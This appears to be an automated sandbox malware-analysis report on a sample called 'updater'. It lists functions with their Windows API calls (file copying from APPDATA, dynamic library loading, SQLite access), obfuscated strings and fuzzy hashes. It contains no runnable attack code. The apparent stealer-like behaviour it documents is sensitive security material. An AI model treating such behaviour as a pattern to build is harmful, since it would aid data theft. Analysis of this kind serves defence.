Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: -journal$-stmtjrnl$:memory:
API String ID: 4218353326-2512898500
Opcode ID: 5cd4912d045003de6f29d1d99112b5b78a27df13d247e2008e7bde373740b034
Instruction ID: 57693a18c204ee8fc12efd7c2d00e91f4bbf32f322e017c7e0d3da10b73f960c
Opcode Fuzzy Hash: 5cd4912d045003de6f29d1d99112b5b78a27df13d247e2008e7bde373740b034
Instruction Fuzzy Hash: 92B1CC72900746AFDB25CFADD840AAABBF0FF54308F14882EE586E7B51D631E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0141215E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,0141221F,?,?,01454064,00000000,?,0141234A,00000004,InitializeCriticalSectionEx,0143BC58,0143BC60,00000000), ref: 014121EE

Strings

api-ms-, xrefs: 014121AE

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bbfb60c4294806c23fdc0d2ba2aaea7a672bc9e50f28da479d9c111b472840f3
Instruction ID: 878a375c12b0405fe68a255b8746498e3b44f27955c63db7bb07f41840d00102
Opcode Fuzzy Hash: bbfb60c4294806c23fdc0d2ba2aaea7a672bc9e50f28da479d9c111b472840f3
Instruction Fuzzy Hash: B511A779A40229ABDF33C66DAC44F5E77A4AF05770F350112EF10E73A8D6B0E90086D1

Uniqueness

Uniqueness Score: -1.00%

Function 014214B3 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 01421537
__alloca_probe_16.LIBCMT ref: 014215FD
__freea.LIBCMT ref: 01421669

Part of subcall function 0142255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E

__freea.LIBCMT ref: 01421672
__freea.LIBCMT ref: 01421695

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 9a67ec56d03151ea301803f9b574d1a94da270945f5c4a295fc0149b5e4251b3
Instruction ID: 7f686d60ab6bc57b9952443840ebce1e31ff745ec0fa0698313afa89a629d5ba
Opcode Fuzzy Hash: 9a67ec56d03151ea301803f9b574d1a94da270945f5c4a295fc0149b5e4251b3
Instruction Fuzzy Hash: A651D872500227AFEB319E69CC40EBF3BA9EF54A50F99016BFD09A7260D774DC91C690

Uniqueness

Uniqueness Score: -1.00%

Function 013EDCBF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 013ECC8A: _strlen.LIBCMT ref: 013ECCB1

_strlen.LIBCMT ref: 013EE07E

Strings

%s.%s, xrefs: 013EE064
sqlite_subquery_%p_, xrefs: 013EDD32
, xrefs: 013EE0B4

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: $%s.%s$sqlite_subquery_%p_
API String ID: 4218353326-1950918665
Opcode ID: a61e5d02286324232713c2aaffde12143fa0e53f632b644e2c878307d661ce72
Instruction ID: d6999f82e6f75d729a39cf8b5d82ae09c59a56244512e4e4e678746910902742
Opcode Fuzzy Hash: a61e5d02286324232713c2aaffde12143fa0e53f632b644e2c878307d661ce72
Instruction Fuzzy Hash: 1E022E71E0032A9FDB15CFA8D4487AEBBF1FF88318F148569D405AB291D775E842CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013BE23E Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 416fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

CopyFileA.KERNEL32 ref: 013BE687

Strings

BKZ., xrefs: 013BE415
APPDATA, xrefs: 013BE391
rLWZKMAG@., xrefs: 013BE358

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: APPDATA$BKZ.$rLWZKMAG@.
API String ID: 265086031-1647078963
Opcode ID: e0630eebdc2e4268f9b596f9dcc3b373437f572679b1a2efa737608c204897d0
Instruction ID: 66a18acb95aa1bdd56dc3550d4fe5ccebb45737ad9703147404c19cdca2932ad
Opcode Fuzzy Hash: e0630eebdc2e4268f9b596f9dcc3b373437f572679b1a2efa737608c204897d0
Instruction Fuzzy Hash: 0C029E31D0025ADEDB25EBA8C990BEDBBB0AF25304F2041AED5457B291EB745F48CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013BF1A2 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 342fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BF4EB

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

APPDATA, xrefs: 013BF2F4
., xrefs: 013BF298
r., xrefs: 013BF34C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: .$APPDATA$r.
API String ID: 265086031-2390542981
Opcode ID: 028e4346bac1de0d00ec10fcf42e82333795215de75e3b20abc4c48172d28874
Instruction ID: f0f45f6fb90f6c73ebff929f01706484bb5427b094f257ea7221434eadea535b
Opcode Fuzzy Hash: 028e4346bac1de0d00ec10fcf42e82333795215de75e3b20abc4c48172d28874
Instruction Fuzzy Hash: 4FE1AF31C0024ADEDF15EBA8C990BEDBBB4AF24304F2441AED51577291EB706F89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013CAA32 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

APIs

Part of subcall function 013CA518: LoadLibraryA.KERNEL32(01455C78), ref: 013CA5B7
Part of subcall function 013CA518: GetProcAddress.KERNEL32(00000000,0145606C), ref: 013CA645

FreeLibrary.KERNEL32 ref: 013CAECC

Strings

., xrefs: 013CAB73
]]YA, xrefs: 013CAD8C
., xrefs: 013CAD9A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: .$.$]]YA
API String ID: 145871493-2355798663
Opcode ID: e1955a41f863cd69477bbb0d68d6b4e44a6e692b660e219e5ea409e6cea09755
Instruction ID: db02a581d45269c2d40a762753032f09caf32f2537e56b871e25cef2a50722d0
Opcode Fuzzy Hash: e1955a41f863cd69477bbb0d68d6b4e44a6e692b660e219e5ea409e6cea09755
Instruction Fuzzy Hash: CCD1AB3090024A9FDB15EFE8C844BEDBBB1BF14718F1541ADE055AB2A2EB705E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 013BECB9 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 341fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BEFFE

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

r., xrefs: 013BEE5F
APPDATA, xrefs: 013BEE07

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: APPDATA$r.
API String ID: 265086031-3513159727
Opcode ID: 240dfc01b0769de2d001eecd1ebcc37d136ac0851368eefacd4335b0e36f843e
Instruction ID: 32a29ad405ea19f6221acd1c05f7f71f31cf5b232bc264b43e0b2b2f7db78085
Opcode Fuzzy Hash: 240dfc01b0769de2d001eecd1ebcc37d136ac0851368eefacd4335b0e36f843e
Instruction Fuzzy Hash: 3DE19F31C0424ADEDB15EBA8C990BEDBBB4AF24308F2441AED50577291EB706F89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 013BD397 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 336fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BD6D8

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

ro\CA\Wr., xrefs: 013BD4AF
APPDATA, xrefs: 013BD4E7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: APPDATA$ro\CA\Wr.
API String ID: 265086031-4119792198
Opcode ID: fd406042e4469f35762a63e383eb75ae66e7c8d0b325a499e76373d540270f4d
Instruction ID: 894da560ac51e60c1ae416fa83a113bda71c94de560da11abff3f53d6ee8260e
Opcode Fuzzy Hash: fd406042e4469f35762a63e383eb75ae66e7c8d0b325a499e76373d540270f4d
Instruction Fuzzy Hash: 76E18D31D0129ADEDB15EBE8C990BEDBBB4AF24308F1040AED5457B251EB705F48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013BFB09 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 314fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BFDDF

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

rtMO]Fr., xrefs: 013BFC16
APPDATA, xrefs: 013BFC51

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: APPDATA$rtMO]Fr.
API String ID: 265086031-1717016301
Opcode ID: 03a52d976a5f2ab3a4b3f4e50f8eb0f4a0c8a523b22118d2979b44b865743a42
Instruction ID: 8ff3b5281617ef0300b115d4d6f8f03f91f903298fa1fa0adef419a7095b1854
Opcode Fuzzy Hash: 03a52d976a5f2ab3a4b3f4e50f8eb0f4a0c8a523b22118d2979b44b865743a42
Instruction Fuzzy Hash: ECD17B31C0425ADEDF15EBA8C890AEDBBB4BF24304F1440AED5097B291EB705E89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013C2A28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013C2B2C
_strlen.LIBCMT ref: 013C2B48

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

~\AJ[MZ`OCK., xrefs: 013C2A85

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_strlen$ConditionVariableWake
String ID: ~\AJ[MZ`OCK.
API String ID: 2310394193-2575923559
Opcode ID: 5e0edc0aa3a522d9f7f1522db0787e3c99f4e7dd2d30cec7308ec493f6dc2274
Instruction ID: 6a9b2e50e596886c1f5ae4e977f92a4abea00a24f8ee12c8613cd9d3c8411fb1
Opcode Fuzzy Hash: 5e0edc0aa3a522d9f7f1522db0787e3c99f4e7dd2d30cec7308ec493f6dc2274
Instruction Fuzzy Hash: DE411531D14686CEEF15EFADC4447AEBBB0AF66B18F14005ED0016B1A2DBB45D46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0142201C Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 014217B1: GetConsoleCP.KERNEL32 ref: 014217F9

WriteFile.KERNEL32(?,00000001,00000000,014502C0,00000000), ref: 0142216D
GetLastError.KERNEL32(?,00000000,00000001), ref: 01422177
__dosmaperr.LIBCMT ref: 014221BC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
Opcode ID: 7cc1758faf1061710d2fbeee1147eaa748aa02380eb915e662e80ae8ce56b9d4
Instruction ID: 60e99518b51a002023259802f598e86d1fc5917966d31e58b03f8aa9c612d659
Opcode Fuzzy Hash: 7cc1758faf1061710d2fbeee1147eaa748aa02380eb915e662e80ae8ce56b9d4
Instruction Fuzzy Hash: 8551F47590022AABEB11DFA9C844FFFBBB9BF19310F540017D600AB271D6B49982C761

Uniqueness

Uniqueness Score: -1.00%

Function 014287FD Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 01428806
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01428874

Part of subcall function 0142749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0142165F,?,00000000,00000000), ref: 0142753D

Part of subcall function 0142255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E

_free.LIBCMT ref: 01428865

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 3471f784f5daaed53e06eea1d72e8046525772e4bc016a351c914c071ac54050
Instruction ID: 2cf8ad3ce74f3d5777828c8d0adc31aeb4480e0d36ae5d7004bc8f7f362cfc6a
Opcode Fuzzy Hash: 3471f784f5daaed53e06eea1d72e8046525772e4bc016a351c914c071ac54050
Instruction Fuzzy Hash: F70188A29012337F3721557B2C88C7F6DADDEE1D91354052AF914D6224EAB1CD8181B1

Uniqueness

Uniqueness Score: -1.00%

Function 014210E3 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 01421139
GetLastError.KERNEL32(?,01421011,?,01450260,0000000C,014210C3,?,?,?), ref: 01421143
__dosmaperr.LIBCMT ref: 0142116E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 875889e8aa3c4cbf5f48ed59cd8da03bdc79405cae3acc93b82c19543290e3e8
Instruction ID: ec5c1d48c5f6615f0aebfd2ec1507876519e123fba41e25589dddb5692dc6368
Opcode Fuzzy Hash: 875889e8aa3c4cbf5f48ed59cd8da03bdc79405cae3acc93b82c19543290e3e8
Instruction Fuzzy Hash: FB010C3270013016E635153ED84977FAB5A4BA6F38FB9055FE904873F2DF7484C54290

Uniqueness

Uniqueness Score: -1.00%

Function 013D3154 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 013D3173
GetLastError.KERNEL32 ref: 013D317E
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 013D31A0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: File$ErrorLastPointerRead
String ID:
API String ID: 64821003-0
Opcode ID: 964edaa0d159b1a6a185ee8be68134cf19213602c4374372f147b080ce46abbb
Instruction ID: 7e97a7057c688601ff79fae6109c8d0fd080eca71b09ef7a145aa28680a5f6fb
Opcode Fuzzy Hash: 964edaa0d159b1a6a185ee8be68134cf19213602c4374372f147b080ce46abbb
Instruction Fuzzy Hash: B8018CB330020AFBDB219EA9EC45F9B7BBCFB053A4F104621F915DA290D270DD4087A1

Uniqueness

Uniqueness Score: -1.00%

Function 013B774B Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 013B777E
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,05F5E100), ref: 013B779B
CloseHandle.KERNEL32(?), ref: 013B77AB

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: 971f638c18207bfcb2c7fdc73aa4d1db1446aab994fda5cc7798828f235f8ec9
Instruction ID: 1d3c423bdfc5874601d5a679006a452b2a373be29bf9b8246c324ccda7d2a943
Opcode Fuzzy Hash: 971f638c18207bfcb2c7fdc73aa4d1db1446aab994fda5cc7798828f235f8ec9
Instruction Fuzzy Hash: 21111674900B40DED7328A2A9885FB3BBF8EBD9769B20855EE69681DD1F2709440CB11

Uniqueness

Uniqueness Score: -1.00%

Function 013B7939 Relevance: 4.5, APIs: 3, Instructions: 33fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,?,00815C28,?,013B84B6), ref: 013B795E
CloseHandle.KERNEL32(00000000), ref: 013B7971
CloseHandle.KERNEL32(00000000), ref: 013B798A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
